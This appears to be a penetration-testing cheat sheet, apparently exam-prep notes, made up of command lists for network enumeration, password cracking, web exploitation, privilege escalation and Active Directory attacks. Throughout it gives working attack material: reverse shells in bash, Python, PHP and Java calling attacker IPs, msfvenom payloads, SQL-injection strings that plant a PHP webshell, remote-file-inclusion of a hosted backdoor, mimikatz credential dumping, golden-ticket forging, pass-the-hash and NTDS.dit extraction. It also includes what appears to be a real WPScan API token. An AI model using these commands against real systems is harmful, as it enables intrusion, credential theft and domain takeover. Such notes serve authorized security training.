Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE> iwr -uri http://lhost/file -Outfile file certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE> copy \\kali\share\file .

wget http://lhost/file curl http://<LHOST>/<FILE> > <OUTPUT_FILE>

kali> impacket-smbserver -smb2support <sharename> . win> copy file \\KaliIP\sharename

net user hacker hacker123 /add net localgroup Administrators hacker /add net localgroup "Remote Desktop Users" hacker /ADD

adduser <uname> #Interactive useradd <uname> useradd -u <UID> -g <group> <uname> #UID can be something new than existing, this command is to add a user to a specific group

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip #Cracking zip files

ssh2john.py id_rsa > hash #Convert the obtained hash to John format(above link) john hashfile --wordlist=rockyou.txt

#Obtain the Hash module number  hashcat -m <number> hash wordlists.txt --force

privilege::debug token::elevate sekurlsa::logonpasswords #hashes and plaintext passwords lsadump::sam lsadump::sam SystemBkup.hiv SamBkup.hiv lsadump::dcsync /user:krbtgt lsadump::lsa /patch #both these dump SAM #OneLiner .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" 

#Creating interface and starting it. sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up #Kali machine - Attacker machine ./proxy -laddr 0.0.0.0:9001 -selfcert #windows or linux machine - compromised machine agent.exe -connect <LHOST>:9001 -ignore-cert #In Ligolo-ng console session #select host ifconfig #Notedown the internal network's subnet start #after adding relevent subnet to ligolo interface #Adding subnet to ligolo interface - Kali linux sudo ip r add <subnet> dev ligolo 

#use -Pn option if you're getting nothing in the scan nmap -sC -sV <IP> -v #Basic scan nmap -T4 -A -p- <IP> -v #complete scan sudo nmap -sV -p 443 --script "vuln" 192.168.50.124 #running vuln category scripts #NSE updatedb locate .nse | grep <name> sudo nmap --script="name" <IP> #here we can specify other options like specific ports...etc Test-NetConnection -Port <port> <IP> #powershell utility 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null #automating port scan of first 1024 ports in powershell

ftp <IP> #login if you have relevant creds or based on nmap scan find out whether this has an anonymous login or not, then login with Anonymous:password put <file> #uploading file get <file> #downloading file #NSE locate .nse | grep ftp nmap -p21 --script=<name> <IP> #bruteforce hydra -L users.txt -P passwords.txt <IP> ftp #'-L' for usernames list, '-l' for username and vice versa # Check for vulnerabilities associated with the identified version.

#Login ssh uname@IP #enter the password in the prompt #id_rsa or id_ecdsa file chmod 600 id_rsa/id_ecdsa ssh uname@IP -i id_rsa/id_ecdsa #if it still asks for the password, crack it using John #cracking id_rsa or id_ecdsa ssh2john id_ecdsa(or)id_rsa > hash john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash #bruteforce hydra -l uname -P passwords.txt <IP> ssh #'-L' for usernames list, '-l' for username and vice versa # Check for vulnerabilities associated with the identified version.

sudo nbtscan -r 192.168.50.0/24 #IP or range can be provided #NSE scripts can be used locate .nse | grep smb nmap -p445 --script="name" $IP #In windows we can view like this net view \\<computername/IP> /all #crackmapexec crackmapexec smb <IP/range> crackmapexec smb 192.168.1.100 -u username -p password crackmapexec smb 192.168.1.100 -u username -p password --shares #lists available shares crackmapexec smb 192.168.1.100 -u username -p password --users #lists users crackmapexec smb 192.168.1.100 -u username -p password --all #all information crackmapexec smb 192.168.1.100 -u username -p password -p 445 --shares #specific port crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain #Inplace of username and password, we can include usernames.txt and passwords.txt for password-spraying or bruteforcing. # Smbclient smbclient -L //IP #or try with 4 /'s smbclient //server/share smbclient //server/share -U <username> smbclient //server/share -U domain/username #SMBmap smbmap -H <target_ip> smbmap -H <target_ip> -u <username> -p <password> smbmap -H <target_ip> -u <username> -p <password> -d <domain> smbmap -H <target_ip> -u <username> -p <password> -r <share_name> #Within SMB session put <file> #to upload file get <file> #to download file

mask "" recurse ON prompt OFF mget *

dirbuster gobuster dir -u http://example.com -w /path/to/wordlist.txt python3 dirsearch.py -u http://example.com -w /path/to/wordlist.txt

hydra -L users.txt -P password.txt <IP or domain> http-{post/get}-form "/path:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V # Use https-post-form mode for https, post, or get, which can be obtained from Burpsuite. Also, capture the response for detailed information. #Bruteforce can also be done by Burpsuite but it's slow, prefer Hydra!

#identifying endpoints using gobuster gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern #pattern can be like {GOBUSTER}/v1 here v1 is just for example, it can be anything #obtaining info using curl curl -i http://192.168.50.16:5002/users/v1

# basic usage wpscan --url "target" --verbose # enumerate vulnerable plugins, users, vulnerable themes, timthumbs wpscan --url "target" --enumerate vp,u,vt,tt --follow-redirection --verbose --log target.log # Add Wpscan API to get the details of vulnerabilties. wpscan --url http://alvida-eatery.org/ --api-token NjnoSGZkuWDve0fDjmmnUNb1ZnkRw6J2J1FvBsVLPkA #Accessing Wordpress shell http://10.10.67.245/retro/wp-admin/theme-editor.php?file=404.php&theme=90s-retro http://10.10.67.245/retro/wp-content/themes/90s-retro/404.php

host www.megacorpone.com host -t mx megacorpone.com host -t txt megacorpone.com for ip in $(cat list.txt); do host $ip.megacorpone.com; done #DNS Bruteforce for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" #bash bruteforcer to find domain name ## DNS Recon dnsrecon -d megacorpone.com -t std #standard recon dnsrecon -d megacorpone.com -D ~/list.txt -t brt #bruteforce, hence we provided list # DNS Bruteforce using dnsenum dnsenum megacorpone.com ## NSlookup, a gold mine nslookup mail.megacorptwo.com nslookup -type=TXT info.megacorptwo.com 192.168.50.151 #We are querying the information from a specific IP, here it is 192.168.50.151. This can be very useful

nc -nv <IP> 25 #Version Detection smtp-user-enum -M VRFY -U username.txt -t <IP> # -M means mode; it can be RCPT, VRFY, EXPN #Sending email with valid credentials, the below is an example of Phishing mail attack sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

ldapsearch -x -H ldap://<IP>:<port> # try on both ldap and ldaps, this is first command to run if you dont have any valid credentials. ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" #CN name describes the info we're collecting ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>" #windapsearch.py #for computers python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --computers #for groups python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --groups #for users python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --da #for privileged users python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --privileged-users

nmap -sV --script=nfs-showmount <IP> showmount -e <IP>

#Nmap UDP scan sudo nmap <IP> -A -T4 -p- -sU -v -oN nmap-udpscan.txt snmpcheck -t <IP> -c public #Better version than snmpwalk as it displays more user friendly snmpwalk -c public -v1 -t 10 <IP> #Displays entire MIB tree, MIB Means Management Information Base snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25 #Windows User enumeration snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2 #Windows Processes enumeration snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2 #Installed software enumeraion snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3 #Opened TCP Ports #Windows MIB values 1.3.6.1.2.1.25.1.6.0 - System Processes 1.3.6.1.2.1.25.4.2.1.2 - Running Programs 1.3.6.1.2.1.25.4.2.1.4 - Processes Path 1.3.6.1.2.1.25.2.3.1.4 - Storage Units 1.3.6.1.2.1.25.6.3.1.2 - Software Name 1.3.6.1.4.1.77.1.2.25 - User Accounts 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports

rpcclient -U=user $IP rpcclient -U="" $IP #Anonymous login ##Commands within in RPCclient srvinfo enumdomusers #users enumpriv #like "whoami /priv" queryuser <user> #detailed user info getuserdompwinfo <RID> #password policy, get user-RID from previous command lookupnames <user> #SID of specified user createdomuser <username> #Creating a user deletedomuser <username> enumdomains enumdomgroups querygroup <group-RID> #get rid from previous command querydispinfo #description of all users netshareenum #Share enumeration, this only comesup if the current user we're logged in has permissions netshareenumall lsaenumsid #SID of all users

cat /etc/passwd #displaying content through absolute path cat ../../../etc/passwd #relative path # if the pwd is /var/log/ then in order to view the /etc/passwd it will be like this cat ../../etc/passwd #In web int should be exploited like this, find a parameters and test it out http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd #check for id_rsa, id_ecdsa #If the output is not getting formatted properly then, curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd #For windows http://192.168.221.193:3000/public/plugins/alertlist/../../../../../../../../Users/install.txt #no need to provide drive

#Sometimes it doesn't show if we try path, then we need to encode them curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

#At first we need  http://192.168.45.125/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami #we're passing a command here #Reverse shells bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1" #We can simply pass a reverse shell to the cmd parameter and obtain reverse-shell bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 #encoded version of above reverse-shell #PHP wrapper curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('uname%20-a');?>" curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php 

1. Obtain a php shell 2. host a file server 3. http://mountaindesserts.com/meteor/index.php?page=http://attacker-ip/simple-backdoor.php&cmd=ls we can also host a php reverseshell and obtain shell.

admin' or '1'='1 ' or '1'='1 " or "1"="1 " or "1"="1"-- " or "1"="1"/* " or "1"="1"# " or 1=1 " or 1=1 -- " or 1=1 - " or 1=1-- " or 1=1/* " or 1=1# " or 1=1- ") or "1"="1 ") or "1"="1"-- ") or "1"="1"/* ") or "1"="1"# ") or ("1"="1 ") or ("1"="1"-- ") or ("1"="1"/* ") or ("1"="1"# ) or '1`='1-

#Application takes some time to reload, here it is 3 seconds http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //

kali> impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth #To login EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; #Now we can run commands EXECUTE xp_cmdshell 'whoami'; #Sometimes we may not have direct access to convert it to RCE from the web, then follow the below steps ' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- // #Writing into a new file #Now we can exploit it http://192.168.45.285/tmp/webshell.php?cmd=id #Command execution

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user #Testing on parameter names "user", we'll get confirmation sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump #Dumping database #OS Shell # Obtain the Post request from Burp suite and save it to post.txt sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" #/var/www/html/tmp is the writable folder on target, hence we're writing there 

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' <?php echo shell_exec('bash -i >& /dev/tcp/10.11.0.106/443 0>&1');?> #For powershell use the encrypted tool that's in Tools folder

String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

#Printspoofer PrintSpoofer.exe -i -c powershell.exe PrintSpoofer.exe -c "nc.exe <lhost> <lport> -e cmd" #RoguePotato RoguePotato.exe -r <AttackerIP> -e "shell.exe" -l 9999 #GodPotato GodPotato.exe -cmd "cmd /c whoami" GodPotato.exe -cmd "shell.exe" #JuicyPotatoNG JuicyPotatoNG.exe -t * -p "shell.exe" -a #SharpEfsPotato SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" #writes whoami command to w.log file

#Identify service from winpeas icalcs "path" #F means full permission, we need to check we have full access on the folder sc qc <servicename> #find binary path variable sc config <service> <option>="<value>" #change the path to the reverse shell location sc start <servicename>

#For checking, it will display some information with file-location reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run #Check the location is writable accesschk.exe \accepteula -wvu "<path>" #returns FILE_ALL_ACCESS #Replace the executable with the reverseshell and we need to wait till Admin logins, then we'll have shell

#For checking, it should return 1 or Ox1 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated #Creating a reverseshell in msi format msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> --platform windows -f msi > reverse.msi #Execute and get shell msiexec /quiet /qn /i reverse.msi

python -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' echo 'os.system('/bin/bash')' /bin/sh -i /bin/bash -i perl -e 'exec "/bin/sh";'

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt #Example type C:\Users\sathvik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 

dir .s *pass* == *.config findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

#These are KeyPassX password-stored files cmd> dir /s /b *.kdbx Ps> Get-ChildItem -Recurse -Filter *.kdbx #Cracking keepass2john Database.kdbx > keepasshash john --wordlist=/home/sathvik/Wordlists/rockyou.txt keepasshash

Import-Module .\PowerView.ps1 #loading module to powershell, if it gives an error then change the execution policy Get-NetDomain #basic information about the domain Get-NetUser #list of all users in the domain # The above command's outputs can be filtered using "select" command. For example, "Get-NetUser | select cn", here cn is a sideheading for the output of the above command. we can select any number of them seperated by comma. Get-NetGroup # enumerate domain groups Get-NetGroup "group name" # information from specific group Get-NetComputer # enumerate the computer objects in the domain Find-LocalAdminAccess # scans the network in an attempt to determine if our current user has administrative permissions on any computers in the domain Get-NetSession -ComputerName files04 -Verbose #Checking logged on users with Get-NetSession, adding verbosity gives more info. Get-NetUser -SPN | select samaccountname,serviceprincipalname # Listing SPN accounts in domain Get-ObjectAcl -Identity <user> # enumerates ACE(access control entities), lists SID(security identifier). ObjectSID Convert-SidToName <sid/objsid> # converting SID/ObjSID to name  # Checking for "GenericAll" right for a specific group, after obtaining they can be converted using convert-sidtoname Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights Find-DomainShare #find the shares in the domain Get-DomainUser -PreauthNotRequired -verbose # identifying AS-REP roastable accounts Get-NetUser -SPN | select serviceprincipalname #Kerberoastable accounts

# Sharphound - transfer sharphound.ps1 into the compromised machine Import-Module .\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory <location> -OutputPrefix "name" # collects and saved with the specified details, output will be saved in windows compromised machine # Bloodhound-Python bloodhound-python -u 'uname' -p 'pass' -ns <rhost> -d <domain-name> -c all #output will be saved in you kali machine

sudo neo4j console # then upload the .json files obtained

# To see user logons at remote system of a domain(external tool) .\PsLoggedon.exe \\<computername>

# Crackmapexec - check if the output shows 'Pwned!' crackmapexec smb <IP or subnet> -u users.txt -p 'pass' -d <domain> --continue-on-success #use continue-on-success option if it's subnet # Kerbrute kerbrute passwordspray -d corp.com .\usernames.txt "pass"

impacket-GetNPUsers -dc-ip <DC-IP> <domain>/<user>:<pass> -request #this gives us the hash of AS-REP Roastable accounts, from kali linux .\Rubeus.exe asreproast /nowrap #dumping from compromised windows host hashcat -m 18200 hashes.txt wordlist.txt --force # cracking hashes

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast #dumping from compromised windows host, and saving with customname impacket-GetUserSPNs -dc-ip <DC-IP> <domain>/<user>:<pass> -request #from kali machine hashcat -m 13100 hashes.txt wordlist.txt --force # cracking hashes

privilege::debug sekurlsa::logonpasswords #obtain NTLM hash of the SPN account here

ps> whoami /user # this gives SID of the user that we're logged in as. If the user SID is "S-1-5-21-1987370270-658905905-1781884369-1105" then the domain SID is "S-1-5-21-1987370270-658905905-1781884369"

kerberos::golden /sid:<domainSID> /domain:<domain-name> /ptt /target:<targetsystem.domain> /service:<service-name> /rc4:<NTLM-hash> /user:<new-user> exit # we can check the tickets by, ps> klist

ps> iwr -UseDefaultCredentials <servicename>://<computername>

secretsdump.py <domain>/<user>:<password>@<IP> secretsdump.py uname@IP -hashes lmhash:ntlmhash #local user secretsdump.py domain/uname@IP -hashes lmhash:ntlmhash #domain user

psexec.py <domain>/<user>:<password1>@<IP> # the user should have write access to Admin share then only we can get sesssion psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 <domain>/<user>@<IP> <command> #we passed full hash here smbexec.py <domain>/<user>:<password1>@<IP> smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 <domain>/<user>@<IP> <command> #we passed full hash here wmiexec.py <domain>/<user>:<password1>@<IP> wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 <domain>/<user>@<IP> <command> #we passed full hash here atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 <domain>/<user>@<IP> <command> #we passed full hash here

winrs -r:<computername> -u:<user> -p:<password> "command" # run this and check whether the user has access on the machine, if you have access then run a powershell reverse-shell # run this on windows session

crackmapexec {smb/winrm/mssql/ldap/ftp/ssh/rdp} #supported services crackmapexec smb <Rhost/range> -u user.txt -p password.txt --continue-on-success # Bruteforcing attack, smb can be replaced. Shows "Pwned" crackmapexec smb <Rhost/range> -u user.txt -p password.txt --continue-on-success | grep '[+]' #grepping the way out! crackmapexec smb <Rhost/range> -u user.txt -p 'password' --continue-on-success #Password spraying, vice versa can also be done #Try --local-auth option if nothing comes up crackmapexec smb <Rhost/range> -u 'user' -p 'password' --shares #lists all shares, provide creds if you have one crackmapexec smb <Rhost/range> -u 'user' -p 'password' --disks crackmapexec smb <DC-IP> -u 'user' -p 'password' --users #we need to provide DC ip crackmapexec smb <Rhost/range> -u 'user' -p 'password' --sessions #active logon sessions crackmapexec smb <Rhost/range> -u 'user' -p 'password' --pass-pol #dumps password policy crackmapexec smb <Rhost/range> -u 'user' -p 'password' --sam #SAM hashes crackmapexec smb <Rhost/range> -u 'user' -p 'password' --lsa #dumping lsa secrets crackmapexec smb <Rhost/range> -u 'user' -p 'password' --ntds #dumps NTDS.dit file crackmapexec smb <Rhost/range> -u 'user' -p 'password' --groups {groupname} #we can also run with a specific group and enumerated users of that group. crackmapexec smb <Rhost/range> -u 'user' -p 'password' -x 'command' #For executing commands, "-x" for cmd and "-X" for powershell command #Pass the hash crackmapexec smb <ip or range> -u username -H <full hash> --local-auth #We can run all the above commands with hash and obtain more information #crackmapexec modules crackmapexec smb -L #listing modules crackmapexec smb -M mimikatx --options #shows the required options for the module crackmapexec smb <Rhost> -u 'user' -p 'password' -M mimikatz #runs default command crackmapexec smb <Rhost> -u 'user' -p 'password' -M mimikatz -o COMMAND='privilege::debug' #runs specific command-M 

.\mimikatz.exe sekurlsa::tickets /export kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi klist dir \\<RHOST>\admin$

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73")) $dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7") $dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A... AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

.\mimikatz.exe privilege::debug #below are some ways lsadump::lsa /inject /name:krbtgt lsadump::lsa /patch lsadump::dcsync /user:krbtgt kerberos::purge #removes any exisiting tickets #sample command kerberos::golden /user:sathvik /domain:evilcorp.com /sid:S-1-5-21-510558963-1698214355-4094250843 /krbtgt:4b4412bbe7b3a88f5b0537ac0d2bf296 /ticket:golden #Saved with name "golden" here, there are other options to check as well

mimikatz.exe #no need for highest privileges kerberos::ptt golden misc::cmd #we're accessing cmd

vshadow.exe -nw -p C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak reg.exe save hklm\system c:\system.bak impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL